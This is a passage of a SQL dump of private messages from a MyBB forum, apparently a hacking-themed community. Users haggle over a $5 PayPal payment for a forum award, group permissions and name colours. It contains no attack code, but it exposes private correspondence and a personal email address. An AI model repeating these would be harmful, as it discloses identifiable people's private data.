'[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\nHey :)\r\nHow do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :)\r\n[/quote]\r\n\r\nIf you donate 5$ to me I tell teh joker that you have done it. And you will get the award.\r\n[/quote]\r\n\r\nk :P whats ur paypal?\r\n[/quote]\r\n\r\nfobonary@hotmail.com\r\n\r\nPM me back once it\'s sent ill let joker know.', '1345916713', '0', '3', '1345917182', '0', '0', '2', '1345917078'); INSERT INTO mybb_privatemessages VALUES('659', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', '[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\nHey :)\r\nHow do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :)\r\n[/quote]\r\n\r\nIf you donate 5$ to me I tell teh joker that you have done it. And you will get the award.\r\n[/quote]\r\n\r\nk :P whats ur paypal?\r\n[/quote]\r\n\r\nfobonary@hotmail.com\r\n\r\nPM me back once it\'s sent ill let joker know.', '1345916713', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('661', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\nHey :)\r\nHow do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :)\r\n[/quote]\r\n\r\nIf you donate 5$ to me I tell teh joker that you have done it. And you will get the award.\r\n[/quote]\r\n\r\nk :P whats ur paypal?\r\n[/quote]\r\n\r\nfobonary@hotmail.com\r\n\r\nPM me back once it\'s sent ill let joker know.\r\n[/quote]\r\n\r\nThere, do whatever u want with the $5 :)', '1345917182', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('662', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', 'Alright aha, Ill let joker know now!', '1345917210', '0', '3', '1345917447', '0', '0', '2', '1345917270'); INSERT INTO mybb_privatemessages VALUES('663', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', 'Alright aha, Ill let joker know now!', '1345917210', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('665', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Kind award', '0', 'http://l33thacking.com/member.php?action=profile&uid=67\r\n\r\nThis user donated me 5$. I\'m quite suprised but he actually did. So he needs the kind award.', '1345917316', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('667', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\']\r\nAlright aha, Ill let joker know now!\r\n[/quote]\r\nOh, and many thanks for the Rep! :) Means alot :P', '1345917447', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('668', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', '[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\nAlright aha, Ill let joker know now!\r\n[/quote]\r\nOh, and many thanks for the Rep! :) Means alot :P\r\n[/quote]\r\n\r\nNo problem, Keep being HQ', '1345917669', '0', '1', '0', '0', '0', '2', '1345917747'); INSERT INTO mybb_privatemessages VALUES('669', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', '[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\nAlright aha, Ill let joker know now!\r\n[/quote]\r\nOh, and many thanks for the Rep! :) Means alot :P\r\n[/quote]\r\n\r\nNo problem, Keep being HQ', '1345917669', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('673', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Name color', '0', 'Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws', '1345918524', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('674', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', 'I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50.\r\n\r\nYou don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.', '1345918661', '0', '3', '1345918848', '0', '0', '2', '1345918787'); INSERT INTO mybb_privatemessages VALUES('675', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', 'I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50.\r\n\r\nYou don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.', '1345918661', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('677', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\']\r\nI just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50.\r\n\r\nYou don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.\r\n[/quote]\r\n\r\nOh, sorry i didnt know :O I dont know how to send without fee', '1345918848', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('678', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', '[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\nI just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50.\r\n\r\nYou don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.\r\n[/quote]\r\n\r\nOh, sorry i didnt know :O I dont know how to send without fee\r\n[/quote]\r\n\r\nIt\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid..', '1345918895', '0', '3', '1345920074', '0', '0', '2', '1345918940'); INSERT INTO mybb_privatemessages VALUES('679', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', '[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\nI just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50.\r\n\r\nYou don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.\r\n[/quote]\r\n\r\nOh, sorry i didnt know :O I dont know how to send without fee\r\n[/quote]\r\n\r\nIt\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid..', '1345918895', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('681', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\nI just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50.\r\n\r\nYou don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.\r\n[/quote]\r\n\r\nOh, sorry i didnt know :O I dont know how to send without fee\r\n[/quote]\r\n\r\nIt\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid..\r\n[/quote]\r\n\r\nI just checked the details, and it says 0 on Fee\r\nhttp://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90', '1345920074', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('682', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', '[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\nI just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50.\r\n\r\nYou don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.\r\n[/quote]\r\n\r\nOh, sorry i didnt know :O I dont know how to send without fee\r\n[/quote]\r\n\r\nIt\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid..\r\n[/quote]\r\n\r\nI just checked the details, and it says 0 on Fee\r\nhttp://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90\r\n[/quote]\r\n\r\nbecause you made me pay for it. I\'m not trying to scam you for 50 cents lol..', '1345921109', '0', '3', '1345927038', '0', '0', '2', '1345924190'); INSERT INTO mybb_privatemessages VALUES('683', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', '[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\nI just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50.\r\n\r\nYou don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.\r\n[/quote]\r\n\r\nOh, sorry i didnt know :O I dont know how to send without fee\r\n[/quote]\r\n\r\nIt\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid..\r\n[/quote]\r\n\r\nI just checked the details, and it says 0 on Fee\r\nhttp://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90\r\n[/quote]\r\n\r\nbecause you made me pay for it. I\'m not trying to scam you for 50 cents lol..', '1345921109', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('685', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\nI just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50.\r\n\r\nYou don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.\r\n[/quote]\r\n\r\nOh, sorry i didnt know :O I dont know how to send without fee\r\n[/quote]\r\n\r\nIt\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid..\r\n[/quote]\r\n\r\nI just checked the details, and it says 0 on Fee\r\nhttp://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90\r\n[/quote]\r\n\r\nbecause you made me pay for it. I\'m not trying to scam you for 50 cents lol..\r\n[/quote]\r\n\r\nSelected \"Other\" :| ', '1345927038', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('686', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', '[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\nI just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50.\r\n\r\nYou don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.\r\n[/quote]\r\n\r\nOh, sorry i didnt know :O I dont know how to send without fee\r\n[/quote]\r\n\r\nIt\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid..\r\n[/quote]\r\n\r\nI just checked the details, and it says 0 on Fee\r\nhttp://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90\r\n[/quote]\r\n\r\nbecause you made me pay for it. I\'m not trying to scam you for 50 cents lol..\r\n[/quote]\r\n\r\nSelected \"Other\" :| \r\n[/quote]\r\n\r\nIt\'s just paypals transfer fee\'s. ', '1345927276', '0', '3', '1345927879', '0', '0', '2', '1345927835'); INSERT INTO mybb_privatemessages VALUES('687', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', '[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\nI just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50.\r\n\r\nYou don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.\r\n[/quote]\r\n\r\nOh, sorry i didnt know :O I dont know how to send without fee\r\n[/quote]\r\n\r\nIt\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid..\r\n[/quote]\r\n\r\nI just checked the details, and it says 0 on Fee\r\nhttp://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90\r\n[/quote]\r\n\r\nbecause you made me pay for it. I\'m not trying to scam you for 50 cents lol..\r\n[/quote]\r\n\r\nSelected \"Other\" :| \r\n[/quote]\r\n\r\nIt\'s just paypals transfer fee\'s. ', '1345927276', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('689', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'NXK\']\r\nI just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50.\r\n\r\nYou don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.\r\n[/quote]\r\n\r\nOh, sorry i didnt know :O I dont know how to send without fee\r\n[/quote]\r\n\r\nIt\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid..\r\n[/quote]\r\n\r\nI just checked the details, and it says 0 on Fee\r\nhttp://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90\r\n[/quote]\r\n\r\nbecause you made me pay for it. I\'m not trying to scam you for 50 cents lol..\r\n[/quote]\r\n\r\nSelected \"Other\" :| \r\n[/quote]\r\n\r\nIt\'s just paypals transfer fee\'s. \r\n[/quote]\r\n\r\nI can send u another $5 when i get paid by my boss, as a Extra friendly donation :3', '1345927879', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('691', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Triple H', '0', 'I already wrote a thread about this 5min ago.\r\nI just wanted to say Triple H copied all his threads and tutorials of other websites. And not giving any credit to the real threadmaker. This is NOT right!\r\n\r\nregards', '1345928082', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('692', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', 'you really don\'t have to, I just need 50 cents for riot points some how. Time to go work the corner.', '1345928138', '0', '1', '0', '0', '0', '2', '1345928190'); INSERT INTO mybb_privatemessages VALUES('693', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', 'you really don\'t have to, I just need 50 cents for riot points some how. Time to go work the corner.', '1345928138', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('697', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', '[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. ', '1345935111', '0', '3', '1345935339', '1', '0', '0', '1345935226'); INSERT INTO mybb_privatemessages VALUES('699', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon', '1345935339', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('700', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n', '1345935578', '0', '3', '1345937958', '1', '0', '0', '1345937852'); INSERT INTO mybb_privatemessages VALUES('704', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: YT', '0', '[quote=\'t3h jok3r\']\r\nThere is a YT video advertisement thread in the OFF Topic forum, the OP has given you credits so can I grant them the award? \r\n[/quote]\r\n\r\nI guess', '1345937869', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('706', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)', '1345937958', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('707', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? ', '1345938277', '0', '3', '1345940173', '1', '0', '0', '1345939284'); INSERT INTO mybb_privatemessages VALUES('710', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?', '1345940173', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('711', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?\r\n[/quote]\r\n\r\nI can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. \r\n\r\nWe can make you a private coding forum for the Coders group, which you would be moderating. ', '1345940715', '0', '3', '1345941145', '1', '0', '0', '1345941068'); INSERT INTO mybb_privatemessages VALUES('713', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?\r\n[/quote]\r\n\r\nI can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. \r\n\r\nWe can make you a private coding forum for the Coders group, which you would be moderating. \r\n[/quote]\r\n\r\nIsnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep', '1345941145', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('714', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?\r\n[/quote]\r\n\r\nI can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. \r\n\r\nWe can make you a private coding forum for the Coders group, which you would be moderating. \r\n[/quote]\r\n\r\nIsnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep\r\n[/quote]\r\n\r\nI\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \"\r\n\r\n', '1345941273', '0', '3', '1345941869', '1', '0', '0', '1345941699'); INSERT INTO mybb_privatemessages VALUES('718', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?\r\n[/quote]\r\n\r\nI can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. \r\n\r\nWe can make you a private coding forum for the Coders group, which you would be moderating. \r\n[/quote]\r\n\r\nIsnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep\r\n[/quote]\r\n\r\nI\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \"\r\n\r\n\r\n[/quote]\r\n\r\nSorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :)', '1345941869', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('719', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', 